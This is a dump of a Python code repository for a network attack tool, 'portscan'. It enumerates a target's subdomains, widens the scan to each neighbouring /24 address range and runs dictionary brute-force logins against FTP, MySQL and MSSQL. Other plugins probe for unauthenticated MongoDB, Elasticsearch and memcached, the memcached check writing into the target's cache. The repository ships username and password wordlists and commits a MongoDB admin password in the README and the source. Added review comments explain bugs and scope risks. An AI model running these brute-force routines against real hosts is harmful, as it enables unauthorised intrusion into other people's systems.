├── .gitattributes ├── .gitignore ├── README.md ├── dict ├── dns_servers.txt ├── ftp_pass.dic ├── ftp_user.dic ├── imap_pass.dic ├── imap_user.dic ├── ipc_pass.dic ├── ipc_user.dic ├── mssql_pass.dic ├── mssql_user.dic ├── mysql_pass.dic ├── mysql_user.dic ├── next_sub.txt ├── pop_pass.dic ├── pop_user.dic ├── ssh_pass.dic ├── ssh_user.dic ├── subnames.txt ├── subnames_largest.txt ├── telnet_pass.dic └── telnet_user.dic ├── lib ├── __init__.py ├── __init__.pyc ├── dnstask.py ├── dnstask.pyc ├── iplist.py ├── iplist.pyc ├── mongodb.py ├── mongodb.pyc ├── plugins │ ├── __init__.py │ ├── __init__.pyc │ ├── elasticsearch.py │ ├── ftp.py │ ├── ftp.pyc │ ├── memcache.py │ ├── mongo.py │ ├── mssql.py │ ├── mysql.py │ ├── oracle.py │ ├── redis.py │ ├── rsync.py │ ├── ssh.py │ └── telnet.py ├── portscan.py └── portscan.pyc ├── require.sh └── scan.py /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Compiled Object files, Static and Dynamic libs (Shared Objects) 2 | *.o 3 | *.a 4 | *.so 5 | 6 | # Folders 7 | _obj 8 | _test 9 | 10 | # Architecture specific extensions/prefixes 11 | *.[568vq] 12 | [568vq].out 13 | 14 | *.cgo1.go 15 | *.cgo2.c 16 | _cgo_defun.c 17 | _cgo_gotypes.go 18 | _cgo_export.* 19 | 20 | _testmain.go 21 | 22 | *.exe 23 | *.test 24 | *.prof 25 | 26 | # ========================= 27 | # Operating 
System Files 28 | # ========================= 29 | 30 | # OSX 31 | # ========================= 32 | 33 | .DS_Store 34 | .AppleDouble 35 | .LSOverride 36 | 37 | # Thumbnails 38 | ._* 39 | 40 | # Files that might appear in the root of a volume 41 | .DocumentRevisions-V100 42 | .fseventsd 43 | .Spotlight-V100 44 | .TemporaryItems 45 | .Trashes 46 | .VolumeIcon.icns 47 | 48 | # Directories potentially created on remote AFP share 49 | .AppleDB 50 | .AppleDesktop 51 | Network Trash Folder 52 | Temporary Items 53 | .apdisk 54 | 55 | # Windows 56 | # ========================= 57 | 58 | # Windows image file caches 59 | Thumbs.db 60 | ehthumbs.db 61 | 62 | # Folder config file 63 | Desktop.ini 64 | 65 | # Recycle Bin used on file shares 66 | $RECYCLE.BIN/ 67 | 68 | # Windows Installer files 69 | *.cab 70 | *.msi 71 | *.msm 72 | *.msp 73 | 74 | # Windows shortcuts 75 | *.lnk 76 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # portscan 2 | 3 | 4 | 依赖 5 | ./req.sh 6 | ``` 7 | apt-get install -y python-dev 8 | apt-get install -y nmap 9 | pip install paramiko 10 | apt-get install -y python2.7-mysqldb 11 | pip install dnspython 12 | pip install pymongo 13 | pip install python-nmap 14 | apt-get install -y freetds-dev 15 | pip install pymssql 16 | pip install redis 17 | pip install python-memcached 18 | pip install 19 | ``` 20 | 21 | mongo设置 22 | ``` 23 | docker run --name hackdb -p 37017:27017 -d mongo --auth 24 | docker exec -it hackdb mongo admin 25 | db.createUser({ user: 'jax777', pwd: 'hackall', roles: [ { role: "__system", db: "admin" } ] }); 26 | ``` 27 | 28 | 29 | 待写 30 | ``` 31 | mstsc 32 | ldap 33 | vnc 34 | Pcanywhere 35 | IIS PUT写文件 36 | Resin 37 | Oracle 1521 38 | PostgreSQL 39 | ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。zookeeper未授权访问,泄露敏感信息,os,hostname,还有存的数据键值,zk默认端口2181 40 | ``` 41 | 
-------------------------------------------------------------------------------- /dict/dns_servers.txt: -------------------------------------------------------------------------------- 1 | 114.114.114.114 2 | 114.114.115.115 3 | 180.76.76.76 4 | 223.5.5.5 5 | 223.6.6.6 6 | -------------------------------------------------------------------------------- /dict/ftp_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%12 3 | %username%123 4 | %null% 5 | 1 6 | 111 7 | 123 8 | 1234 9 | 12345 10 | 123456 11 | 1234567 12 | 12345678 13 | 654321 14 | 54321 15 | 00000000 16 | 88888888 17 | admin 18 | root 19 | pass 20 | passwd 21 | password 22 | super 23 | !@#$%^&* 24 | 37wan 25 | 37youxi 26 | 37yunwei 27 | yunwei_37 28 | 37_yunwei 29 | test 30 | test123 31 | qazxsw123 32 | 1qazxsw2 33 | 1qazxsw23edc 34 | 753951 35 | 37wan.com 36 | www.37.com 37 | 37games 38 | password 39 | qwerty 40 | abc123 41 | abc1234 42 | abc123456 43 | 123456789 44 | iloveyou 45 | fuckyou 46 | 000000 -------------------------------------------------------------------------------- /dict/ftp_user.dic: -------------------------------------------------------------------------------- 1 | root 2 | admin 3 | webmaster 4 | user 5 | test 6 | web 7 | www 8 | administrator 9 | oracle 10 | sybase 11 | informix 12 | oracle8 13 | backup 14 | lizdy 15 | server 16 | data 17 | account 18 | access 19 | ftproot 20 | pwrchute -------------------------------------------------------------------------------- /dict/imap_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%12 3 | %username%123 4 | %null% 5 | 1 6 | 111 7 | 123 8 | 1234 9 | 12345 10 | 123456 11 | 1234567 12 | 12345678 13 | 654321 14 | 54321 15 | 00000000 16 | 88888888 17 | admin 18 | root 19 | pass 20 | passwd 21 | password 22 | super 23 | !@#$%^&* -------------------------------------------------------------------------------- 
/dict/imap_user.dic: -------------------------------------------------------------------------------- 1 | root 2 | admin 3 | webmaster 4 | user 5 | test 6 | web 7 | www 8 | administrator 9 | oracle 10 | sybase 11 | informix 12 | oracle8 13 | backup 14 | lizdy 15 | server 16 | data 17 | account 18 | access 19 | pwrchute -------------------------------------------------------------------------------- /dict/ipc_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%12 3 | %username%123 4 | %null% 5 | 1 6 | 111 7 | 123 8 | 1234 9 | 12345 10 | 123456 11 | 1234567 12 | 12345678 13 | 654321 14 | 54321 15 | 00000000 16 | 88888888 17 | admin 18 | root 19 | pass 20 | passwd 21 | password 22 | super 23 | !@#$%^&* -------------------------------------------------------------------------------- /dict/ipc_user.dic: -------------------------------------------------------------------------------- 1 | administrator 2 | admin 3 | user 4 | guest 5 | webmaster -------------------------------------------------------------------------------- /dict/mssql_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%12 3 | %username%123 4 | %null% 5 | 1 6 | 111 7 | 123 8 | 1234 9 | 12345 10 | 123456 11 | 1234567 12 | 12345678 13 | 654321 14 | 54321 15 | 00000000 16 | 88888888 17 | admin 18 | root 19 | pass 20 | passwd 21 | password 22 | super 23 | !@#$%^&* 24 | user -------------------------------------------------------------------------------- /dict/mssql_user.dic: -------------------------------------------------------------------------------- 1 | sa 2 | sql 3 | database 4 | admin 5 | facemash 6 | root -------------------------------------------------------------------------------- /dict/mysql_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %null% 3 | 123 4 | 1234 5 | 12345 6 | 123456 7 | admin 8 | root 
9 | pass 10 | password 11 | pa$$word 12 | blah 13 | vas867832 14 | kfac7890 15 | blog&|!1 16 | newsearch 17 | hntdep7 18 | 1-a-2-b-3-c-4-d 19 | cambiame 20 | sr2498 21 | Rlqja1004 22 | a123456 23 | c9v9c5d 24 | 8leb1l09 25 | changeme 26 | vpn 27 | brad 28 | apmsetup 29 | insider123+! 30 | god1 31 | 891222 32 | autoset 33 | 20140303Dyw 34 | buratino 35 | 26rivFOy 36 | a2 -------------------------------------------------------------------------------- /dict/mysql_user.dic: -------------------------------------------------------------------------------- 1 | root 2 | mysql 3 | facemash 4 | xbt 5 | user 6 | a2808024_vas7831 7 | kfac 8 | a1650715_root 9 | newsearch 10 | a9487812_simon 11 | a5970070_ander 12 | webguest 13 | cambiame 14 | a4964131_usr 15 | civicedu 16 | insider 17 | testapp 18 | sch9 19 | admin546_5 -------------------------------------------------------------------------------- /dict/next_sub.txt: -------------------------------------------------------------------------------- 1 | test 2 | test2 3 | t 4 | dev 5 | 1 6 | 2 7 | 3 8 | s1 9 | s2 10 | s3 11 | admin 12 | adm 13 | a 14 | ht 15 | adminht 16 | webht 17 | web 18 | gm 19 | sys 20 | system 21 | manage 22 | manager 23 | mgr 24 | b 25 | c 26 | passport 27 | bata 28 | wei 29 | weixin 30 | wechat 31 | wx 32 | wiki 33 | upload 34 | ftp 35 | pic 36 | jira 37 | zabbix 38 | nagios 39 | bug 40 | bugzilla 41 | sql 42 | mysql 43 | db 44 | stmp 45 | pop 46 | imap 47 | mail 48 | zimbra 49 | exchange 50 | forum 51 | bbs 52 | list 53 | count 54 | counter 55 | img 56 | img01 57 | img02 58 | img03 59 | img04 60 | api 61 | cache 62 | js 63 | css 64 | app 65 | apps 66 | wap 67 | m 68 | sms 69 | zip 70 | monitor 71 | proxy 72 | update 73 | upgrade 74 | stat 75 | stats 76 | data 77 | portal 78 | blog 79 | autodiscover 80 | en 81 | search 82 | so 83 | oa 84 | database 85 | home 86 | sso 87 | help 88 | vip 89 | s 90 | w 91 | down 92 | download 93 | downloads 94 | dl 95 | svn 96 | git 97 | log 98 | staff 99 | vpn 100 | 
sslvpn 101 | ssh 102 | scanner 103 | sandbox 104 | ldap 105 | lab 106 | go 107 | demo 108 | console 109 | cms 110 | auth 111 | crm 112 | erp 113 | res 114 | static 115 | old 116 | new 117 | beta 118 | image 119 | service 120 | login 121 | 3g 122 | docs 123 | it 124 | e 125 | live 126 | library 127 | files 128 | i 129 | d 130 | cp 131 | connect 132 | gateway 133 | lib 134 | preview 135 | backup 136 | share 137 | status 138 | assets 139 | user 140 | vote 141 | bugs 142 | cas 143 | feedback 144 | id 145 | edm 146 | survey 147 | union 148 | ceshi 149 | dev1 150 | updates 151 | phpmyadmin 152 | pma 153 | edit 154 | master 155 | xml 156 | control 157 | profile 158 | zhidao 159 | tool 160 | toolbox 161 | boss 162 | activity -------------------------------------------------------------------------------- /dict/pop_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%12 3 | %username%123 4 | %null% 5 | 1 6 | 111 7 | 123 8 | 1234 9 | 12345 10 | 123456 11 | 1234567 12 | 12345678 13 | 654321 14 | 54321 15 | 00000000 16 | 88888888 17 | admin 18 | root 19 | pass 20 | passwd 21 | password 22 | super 23 | !@#$%^&* -------------------------------------------------------------------------------- /dict/pop_user.dic: -------------------------------------------------------------------------------- 1 | root 2 | admin 3 | webmaster 4 | user 5 | test 6 | web 7 | www 8 | administrator 9 | oracle 10 | sybase 11 | informix 12 | oracle8 13 | backup 14 | lizdy 15 | server 16 | data 17 | account 18 | access 19 | pwrchute -------------------------------------------------------------------------------- /dict/ssh_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%12 3 | %username%123 4 | %null% 5 | 1 6 | 111 7 | 123 8 | 1234 9 | 12345 10 | 123456 11 | 1234567 12 | 12345678 13 | 654321 14 | 54321 15 | 00000000 16 | 88888888 17 | admin 18 | root 19 | pass 20 | 
passwd 21 | password 22 | super 23 | !@#$%^&* -------------------------------------------------------------------------------- /dict/ssh_user.dic: -------------------------------------------------------------------------------- 1 | root 2 | admin 3 | webmaster 4 | user 5 | test 6 | web 7 | www 8 | oracle 9 | sybase 10 | informix 11 | oracle8 12 | backup 13 | lizdy 14 | server 15 | data 16 | account 17 | access -------------------------------------------------------------------------------- /dict/telnet_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%12 3 | %username%123 4 | %null% 5 | 1 6 | 111 7 | 123 8 | 1234 9 | 12345 10 | 123456 11 | 1234567 12 | 12345678 13 | 654321 14 | 54321 15 | 00000000 16 | 88888888 17 | admin 18 | root 19 | pass 20 | passwd 21 | password 22 | super 23 | !@#$%^&* -------------------------------------------------------------------------------- /dict/telnet_user.dic: -------------------------------------------------------------------------------- 1 | root 2 | admin 3 | webmaster 4 | user 5 | test 6 | web 7 | www 8 | oracle 9 | sybase 10 | informix 11 | oracle8 12 | backup 13 | lizdy 14 | server 15 | data 16 | account 17 | access -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/__init__.py -------------------------------------------------------------------------------- /lib/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/__init__.pyc -------------------------------------------------------------------------------- /lib/dnstask.py: -------------------------------------------------------------------------------- 
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# __author__ jax777
#
# Subdomain enumeration stage of the scanner (Python 2: ``Queue`` module,
# ``except X, e`` syntax, ``print`` statements elsewhere in the project).
# Resolves candidate names from a word list against the DNS servers in
# dict/dns_servers.txt and stores every resolved address in MongoDB for the
# port-scan stage in lib/portscan.py to pick up.
import Queue
import sys
import dns.resolver
import threading
import time
import os

def is_intranet(ip): # intranet IP check
    """Return 1 when *ip* looks like a private (RFC 1918) address, else 0.

    Anything that does not split into four dot-separated parts is also
    reported as 1 (treated as intranet, i.e. excluded from lib/iplist.py's
    /24 expansion, which only selects ``islocal == 0`` records).
    ``int(ret[1])`` raises ValueError on a non-numeric second octet; the only
    caller in this file runs inside a ``try`` that swallows Exception.
    """
    ret = ip.split('.')
    if not len(ret) == 4:
        return 1
    if ret[0] == '10':
        return 1
    # NOTE(review): RFC 1918 covers 172.16.0.0-172.31.255.255; the upper
    # bound of 32 here also classifies 172.32.x.x as private.
    if ret[0] == '172' and 16 <= int(ret[1]) <= 32:
        return 1
    if ret[0] == '192' and ret[1] == '168':
        return 1
    return 0



class Dnstask:
    """Multi-threaded subdomain resolver that writes hits to a Mongo collection.

    ``run()`` holds ``g_lock`` for the whole task so scan.py can sequence the
    stages; worker threads share ``self.queue`` (names still to resolve),
    ``self.ip_dict`` (per-address hit counts used for wildcard detection) and
    the counters guarded by ``self.lock``.
    """
    def __init__(self, target,names_file, threads_num,mongodb,g_lock):
        # target: domain suffix appended to every candidate name.
        # names_file: word list; looked up under dict/ unless the path exists.
        # threads_num: number of worker threads AND number of resolvers.
        # mongodb: pymongo collection receiving one document per address.
        # g_lock: stage lock shared with scan.py (acquired in run()).
        self.db = mongodb
        self.STOP_ME = False
        self.target = target.strip()
        self.names_file = names_file
        self.thread_count = self.threads_num = threads_num
        self.scan_count = self.found_count = 0
        self.lock = threading.Lock()
        # One Resolver per thread; _scan() indexes it by the thread's name.
        self.resolvers = [dns.resolver.Resolver() for _ in range(threads_num)]
        self._load_dns_servers()
        self._load_sub_names()
        self._load_next_sub()
        self.ip_dict = {}
        self.STOP_ME = False
        self.g_lock = g_lock



    def _load_dns_servers(self):
        """Read dict/dns_servers.txt into ``self.dns_servers`` (deduplicated).

        Only lines containing exactly three dots are accepted; there is no
        further validation of the address.  ``self.dns_count`` is used to
        spread threads over the servers round-robin.  With an empty file
        ``dns_count`` is 0 and the modulo in _scan() raises ZeroDivisionError.
        """
        dns_servers = []
        with open('dict/dns_servers.txt') as f:
            for line in f:
                server = line.strip()
                if server.count('.') == 3 and server not in dns_servers:
                    dns_servers.append(server)
        self.dns_servers = dns_servers
        self.dns_count = len(dns_servers)

    def _load_sub_names(self):
        """Fill ``self.queue`` with the non-empty lines of the names file.

        A relative or bare file name that does not exist is resolved under
        ``dict/`` (the default 'subnames.txt' from scan.py ends up as
        dict/subnames.txt).  A missing file raises IOError to the caller.
        """
        self.queue = Queue.Queue()
        file = 'dict/' + self.names_file if not os.path.exists(self.names_file) else self.names_file
        with open(file) as f:
            for line in f:
                sub = line.strip()
                if sub: self.queue.put(sub)

    def _load_next_sub(self):
        """Read dict/next_sub.txt into ``self.next_subs`` (deduplicated).

        These labels are prepended to every name that resolves, so each hit
        enqueues ``len(next_subs)`` further candidates (see _scan()).
        """
        next_subs = []
        with open('dict/next_sub.txt') as f:
            for line in f:
                sub = line.strip()
                if sub and sub not in next_subs:
                    next_subs.append(sub)
        self.next_subs = next_subs
    def _update_scan_count(self):
        """Increment ``scan_count`` under ``self.lock``."""
        self.lock.acquire()
        self.scan_count += 1
        self.lock.release()

    def _print_progress(self):
        """Rewrite the progress line on stdout (carriage return, no newline)."""
        self.lock.acquire()
        msg = '%s found | %s remaining | %s scanned in %.2f seconds' % (
            self.found_count, self.queue.qsize(), self.scan_count, time.time() - self.start_time)
        sys.stdout.write('\r' + ' ' + msg)
        sys.stdout.flush()
        self.lock.release()


    def _scan(self):
        """Worker body: resolve names from the queue until it drains or STOP_ME.

        The thread name (set to its index in run()) selects this thread's
        resolver and, round-robin, its nameserver.  For each name up to six
        attempts are made; a successful lookup records every A-record address
        once (``find(...).count() == 0`` dedup on ``ip``), prints the name, and
        pushes ``next_subs`` combinations back onto the queue.  Work stops once
        ``found_count`` reaches 4000.  On exit the thread decrements
        ``thread_count`` so run() can notice completion.

        Wildcard handling: an address seen more than twice across the whole
        run marks the lookup as a wildcard and the name is not recorded.
        Note that ``continue`` then re-enters the retry loop for the same
        name, so a wildcard name is re-queried up to six times and each pass
        bumps ``scan_count``.

        NOTE(review): ``queue.get(timeout=1.0)`` is outside the ``try``; if a
        sibling thread drains the queue between the ``qsize()`` check and the
        ``get``, Queue.Empty propagates, the thread ends without decrementing
        ``thread_count``, and run() never terminates.  The acquire/release
        pairs below are also not ``try``/``finally`` protected, so an
        exception between them would leave ``self.lock`` held.
        """
        thread_id = int( threading.currentThread().getName() )
        self.resolvers[thread_id].nameservers.insert(0, self.dns_servers[thread_id % self.dns_count])
        self.resolvers[thread_id].lifetime = self.resolvers[thread_id].timeout = 10.0
        while self.queue.qsize() > 0 and not self.STOP_ME and self.found_count < 4000: # limit found count to 4000
            sub = self.queue.get(timeout=1.0)
            for _ in range(6):
                try:
                    cur_sub_domain = sub + '.' + self.target
                    # Default rdtype is A, so each answer carries .address.
                    answers = self.resolvers[thread_id].query(cur_sub_domain)
                    is_wildcard_record = False
                    if answers:
                        for answer in answers:
                            self.lock.acquire()
                            if answer.address not in self.ip_dict:
                                self.ip_dict[answer.address] = 1
                            else:
                                self.ip_dict[answer.address] += 1
                                if self.ip_dict[answer.address] > 2: # a wildcard DNS record
                                    is_wildcard_record = True
                            self.lock.release()
                        if is_wildcard_record:
                            self._update_scan_count()
                            self._print_progress()
                            continue
                        self.lock.acquire()
                        self.found_count += 1
                        msg = cur_sub_domain.ljust(30)
                        sys.stdout.write( msg + '\n')
                        sys.stdout.flush()
                        self.lock.release()
                        # Fan out: every label in next_sub.txt becomes a new
                        # candidate one level below the name that just resolved.
                        for i in self.next_subs:
                            self.queue.put(i + '.' + sub)
                        for answer in answers:
                            temp = answer.address
                            # Address is written without a trailing newline.
                            sys.stdout.write(temp)
                            # Document shape consumed by lib/iplist.py and
                            # lib/portscan.py: status 0 = not yet port-scanned.
                            ip_info = dict(
                                site = cur_sub_domain,
                                ip = temp,
                                portinfo = {},
                                islocal = is_intranet(temp),
                                status = 0,
                                isup = 1
                            )
                            if self.db.find({"ip": temp }).count() == 0 :
                                self.db.insert(ip_info)
                    # Lookup completed (with or without answers): no retry.
                    break
                except dns.resolver.NoNameservers, e:
                    # No server answered at all: give up on this name.
                    break
                except Exception, e:
                    # NXDOMAIN, timeouts, ValueError from is_intranet(), Mongo
                    # errors: all silently retried up to six times.
                    pass
            self._update_scan_count()
            self._print_progress()
        self._print_progress()
        self.lock.acquire()
        self.thread_count -= 1
        self.lock.release()
    def run(self):
        """Start the worker threads and block until all of them have exited.

        Holds ``g_lock`` from start to finish.  Threads are daemons so a
        KeyboardInterrupt only sets ``STOP_ME`` and keeps waiting for them to
        drain.  Once ``thread_count`` drops to 1 the loop no longer sleeps
        (the ``> 1`` test), so it busy-waits until the last thread finishes.
        """
        self.g_lock.acquire()
        self.start_time = time.time()
        for i in range(self.threads_num):
            # Thread name doubles as the resolver index in _scan().
            t = threading.Thread(target=self._scan, name=str(i))
            t.setDaemon(True)
            t.start()
        while 1:
            if self.thread_count > 1:
                try:
                    time.sleep(1.0)
                except KeyboardInterrupt,e:
                    msg = '[WARNING] User aborted, wait all slave threads to exit...'
                    sys.stdout.write('\r' + msg + '\n\r')
                    sys.stdout.flush()
                    self.STOP_ME = True
            if self.thread_count == 0:
                self.g_lock.release()
                break
--------------------------------------------------------------------------------
/lib/dnstask.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/dnstask.pyc
--------------------------------------------------------------------------------
/lib/iplist.py:
--------------------------------------------------------------------------------
import re



def lsip(mongodb):
    """Expand every non-intranet address in ``mongodb`` into its whole /24.

    Collects the distinct ``a.b.c.`` prefixes of all documents with
    ``islocal == 0`` and inserts a status-0 document for each missing host
    ``a.b.c.1`` .. ``a.b.c.254`` so the port-scan stage visits them too.

    NOTE(review): this widens the scan from addresses that actually resolved
    for the target to every neighbour in the same /24, most of which were
    never associated with the target domain; confirm that is the intended
    scope before running it.  The regex's dots are unescaped (``.`` matches
    any character), which still yields the prefix for well-formed dotted
    quads; ``tempip[0]`` raises IndexError if a stored ``ip`` does not match.
    """
    ip_info = dict(
        site = "",
        ip = "",
        portinfo = {},
        islocal = 0,
        status = 0
    )
    iplist = []
    for item in mongodb.find({"islocal": 0 }):
        # Yields e.g. '1.2.3.' (trailing separator kept) for '1.2.3.4'.
        tempip = re.findall(r'\d+.\d+.\d+.',item["ip"])
        if tempip[0] not in iplist:
            iplist.append(tempip[0])
    for ip in iplist:
        for i in range(1,255):
            iptemp = ip + str(i)
            # One count() query per candidate address: 254 round trips per /24.
            if mongodb.find({"ip": iptemp }).count() == 0 :
                ip_info = dict(
                    site = "",
                    ip = iptemp,
                    portinfo = {},
                    islocal = 0,
                    status = 0,
                    isup = 1
                )
                mongodb.insert(ip_info)
--------------------------------------------------------------------------------
/lib/iplist.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/iplist.pyc
--------------------------------------------------------------------------------
/lib/mongodb.py:
--------------------------------------------------------------------------------
# coding: utf8
import pymongo

# Connection settings for the results database.
# NOTE(review): the username/password are committed in source and repeated
# in README.md, which creates this user with the ``__system`` role on
# ``admin`` (full cluster privilege).  They should be loaded from the
# environment or a config file outside the repository, and the account
# should be rotated now that it has been published.
db_info = dict(
    host="127.0.0.1",
    port=37017,
    username="jax777",
    password="hackall"
)



def Mongodb( db_info,db_name):
    """Return collection *db_name* of database ``scan_info``.

    Connects with ``db_info['host']``/``['port']`` and authenticates the
    client with the ``username``/``password`` from *db_info*, using
    ``admin`` as the credential source.  The ``security_detect`` database
    handle is only the object the authenticate call is issued on.  No
    timeout is set on the client.  scan.py calls this twice: once for the
    host collection (named after the target) and once for ``<target>_vul``.
    """
    db_info = db_info
    client = pymongo.MongoClient(db_info.get('host'), db_info.get('port'))
    client.security_detect.authenticate(
        db_info.get('username'),
        db_info.get('password'),
        source='admin'
    )
    db = client["scan_info"]
    return db[db_name]

--------------------------------------------------------------------------------
/lib/mongodb.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/mongodb.pyc
--------------------------------------------------------------------------------
/lib/plugins/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/plugins/__init__.py
--------------------------------------------------------------------------------
/lib/plugins/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/plugins/__init__.pyc
--------------------------------------------------------------------------------
/lib/plugins/elasticsearch.py:
--------------------------------------------------------------------------------
# coding:utf-8


def elasticsearch_attack(host, port, mongo):
    """Record *host*:*port* as an exposed Elasticsearch instance.

    No probe is made: lib/portscan.py calls this for every host with TCP
    9200 open, and the document is inserted unconditionally.  The
    ``username``/``password`` fields are always empty.
    """
    _info = dict(
        name="elasticsearch",
        ip=host,
        port=port,
        username="",
        password=""
    )
    mongo.insert(_info)
--------------------------------------------------------------------------------
/lib/plugins/ftp.py:
--------------------------------------------------------------------------------
# coding:utf-8

import ftplib



def ftp_attack(host, port, mongo):
    """Check an FTP service for anonymous or weak-password login; record hits.

    Anonymous login is tried first and, if it succeeds, recorded with empty
    credentials and the function returns.  Otherwise every line of
    dict/ftp_user.dic is paired with every line of dict/ftp_pass.dic; the
    first password that works for a user is recorded and the inner loop
    ends (``break`` leaves only the password loop, so the remaining users
    are still tried).  Each attempt is a fresh connection with a 5 s
    timeout, so a run is ``users x passwords`` separate login failures on
    the target -- a pattern a server-side rate limit or failed-login alert
    would see.

    The dictionaries contain placeholder tokens such as ``%username%`` and
    ``%null%``; nothing here substitutes them, they are sent literally.
    Only ``ftplib.all_errors`` are swallowed; a missing dictionary file
    raises IOError to the caller (lib/portscan.py prints "nofile").  The
    dictionary file handles are never closed explicitly.
    """
    _info = dict(
        name="ftp",
        ip=host,
        port=port,
        username="",
        password=""
    )
    # Try anonymous login first.
    try:
        ftp = ftplib.FTP()
        ftp.connect(host, port, 5)
        ftp.login()
        ftp.quit()
        mongo.insert(_info)
        return
    except ftplib.all_errors:
        pass

    # Dictionary brute-force attempt.
    for username in open("dict/ftp_user.dic"):
        for password in open("dict/ftp_pass.dic"):
            _username = username.strip()
            _password = password.strip()
            try:
                ftp = ftplib.FTP()
                ftp.connect(host, port, 5)
                ftp.login(_username, _password)
                ftp.quit()
                _info["username"] = _username
                _info["password"] = _password
                mongo.insert(_info)
                break
            except ftplib.all_errors:
                pass
--------------------------------------------------------------------------------
/lib/plugins/ftp.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/plugins/ftp.pyc
--------------------------------------------------------------------------------
/lib/plugins/memcache.py:
--------------------------------------------------------------------------------
# coding:utf-8
import memcache
def memcache_attack(host, port, mongo):
    """Record *host*:*port* as an unauthenticated memcached if a write works.

    The check is a real write (``foo`` = ``bar``) into the target's cache,
    i.e. a side effect on the service, not a read-only probe.

    As called from lib/portscan.py, *port* is an ``int`` (``int(j)``), so
    ``host+':'+port`` raises TypeError before any connection is made; the
    bare ``except`` swallows it and nothing is recorded.  Even with a
    string port, python-memcached's ``set`` reports failure by its return
    value rather than by raising (verify against the installed version), so
    the ``except`` would not distinguish a refused write.
    """
    _info = dict(
        name="memcache",
        ip=host,
        port=port,
        username="",
        password=""
    )
    try:

        mc = memcache.Client([host+':'+port],debug=0)
        mc.set("foo","bar")
        mongo.insert(_info)
    except:
        pass
--------------------------------------------------------------------------------
/lib/plugins/mongo.py:
--------------------------------------------------------------------------------
# coding:utf-8
import pymongo


def mongo_attack(host, port, mongo):
    """Record *host*:*port* as a MongoDB that lists databases without auth.

    Connects with a 3 s socket timeout and calls ``database_names()``; any
    exception (auth required, unreachable, timeout) is swallowed and the
    host is not recorded.  *mongo* is the results collection, distinct from
    the instance being probed.  The connection is never closed explicitly.
    """
    _info = dict(
        name="mongo",
        ip=host,
        port=port,
        username="",
        password=""
    )
    try:
        conn = pymongo.MongoClient(host, port, socketTimeoutMS=3000)
        dbname = conn.database_names()
        mongo.insert(_info)
    except:
        pass

--------------------------------------------------------------------------------
/lib/plugins/mssql.py:
--------------------------------------------------------------------------------
#coding:utf-8

import pymssql

def mssql_attack(host, port, mongo):
    """Try dictionary credentials against an MSSQL service; record the hit.

    Reads dict/ssh_user.dic and dict/ssh_pass.dic (the SSH lists, not the
    mssql_*.dic files present in dict/), and for each pair attempts
    ``pymssql.connect`` with ``database="*"``; *port* is not passed, so the
    driver's default is used.  The first password that works for a user is
    recorded and the password loop ends; the remaining users are still
    tried.  The bare ``except`` hides every failure mode, including a
    missing dictionary file, which therefore never reaches lib/portscan.py's
    IOError handler.
    """
    _info = dict(
        name="mssql",
        ip=host,
        port=port,
        username="",
        password=""
    )

    # Dictionary brute-force attempt.
    for username in open("dict/ssh_user.dic", "r"):
        for password in open("dict/ssh_pass.dic", "r"):
            _username = username.strip()
            _password = password.strip()
            try:
                conn=pymssql.connect(host=host,user=_username,password=_password,database="*")
                _info["username"] = _username
                _info["password"] = _password
                mongo.insert(_info)
                conn.close()
                break
            except:
                pass
--------------------------------------------------------------------------------
/lib/plugins/mysql.py:
--------------------------------------------------------------------------------
#coding:utf-8
import MySQLdb

def mysql_attack(host, port, mongo):
    """Try dictionary credentials against a MySQL service; record the hit.

    Pairs every line of dict/mysql_user.dic with every line of
    dict/mysql_pass.dic.  The connection always targets port 3306; the
    *port* argument is only stored in the result document.  The first
    working password per user is recorded, then the next user is tried.
    The bare ``except`` swallows everything, including a missing dictionary
    file.  File handles are not closed explicitly.
    """
    _info = dict(
        name="mysql",
        ip=host,
        port=port,
        username="",
        password=""
    )

    # Dictionary brute-force attempt.
    for username in open("dict/mysql_user.dic", "r"):
        for password in open("dict/mysql_pass.dic", "r"):
            _username = username.strip()
            _password = password.strip()
            try:
                db = MySQLdb.connect(host=host, user=_username, passwd=_password, port=3306)
                _info["username"] = _username
                _info["password"] = _password
                mongo.insert(_info)
                db.close()
                break
            except:
                pass

